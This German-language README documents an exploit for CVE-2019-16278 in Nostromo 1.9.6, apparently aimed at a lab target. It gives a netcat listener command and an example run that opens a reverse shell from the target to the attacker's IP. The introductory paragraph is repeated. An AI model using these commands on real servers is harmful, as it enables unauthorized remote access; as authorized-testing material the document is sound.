
Dieses Repository enthält einen Exploit für CVE-2019-16278 im Nostromo Web Server 1.9.6, der Remote-Codeausführung über eine Directory-Traversal-Sicherheitslücke ermöglicht. Das Skript verwendet pwntools, um eine Reverse Shell herzustellen. Nur für Bildungszwecke und autorisierte Tests.
Dieses Repository enthält einen Exploit für CVE-2019-16278 im Nostromo Web Server 1.9.6, der Remote-Code-Ausführung über eine Directory-Traversal-Schwachstelle ermöglicht. Das Skript verwendet pwntools, um eine Reverse-Shell herzustellen. Nur für Bildungszwecke und autorisierte Tests.
Um pwntools zu installieren, verwenden Sie:
pip3 install pwntools
Listener starten: Starten Sie auf dem Angreifer-Rechner einen Listener auf dem angegebenen Port, um die Reverse-Shell zu empfangen:
nc -lvnp <angreifer-port>
Skript ausführen: Verwenden Sie den folgenden Befehl, um das Exploit-Skript auszuführen. Ersetzen Sie die Werte nach Bedarf.
python3 exploit.py --attacker-ip <angreifer-ip> --attacker-port <angreifer-port> [-t ziel-ip] [-p ziel-port]
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
In diesem Beispiel:
--attacker-ip 10.10.14.15 ist die IP-Adresse des Angreifer-Rechners.--attacker-port 4444 ist der Port, auf dem der Angreifer-Rechner auf die Reverse-Shell wartet.-t 10.10.10.165 gibt die Ziel-IP an (Standard ist 10.10.10.165).-p 80 gibt den Ziel-Port an (Standard ist 80).nc).Bei Erfolg sollten Sie eine Reverse-Shell auf Ihrem Listener erhalten, die Zugriff auf das Zielsystem gewährt.
Dieses Skript ist nur für Bildungszwecke und autorisierte Tests bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Der Autor und die Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden. Nutzen Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine Testberechtigung haben.
| Option | Beschreibung | Standard |
|---|
-t, --target | IP-Adresse des entfernten Hosts | 10.10.10.165 |
-p, --port | Port auf dem entfernten Host, der angegriffen werden soll | 80 |
--attacker-ip | IP-Adresse des Angreifer-Rechners für die Reverse-Shell | Keine (erforderlich) |
--attacker-port | Port auf dem Angreifer-Rechner für die Reverse-Shell | Keine (erforderlich) |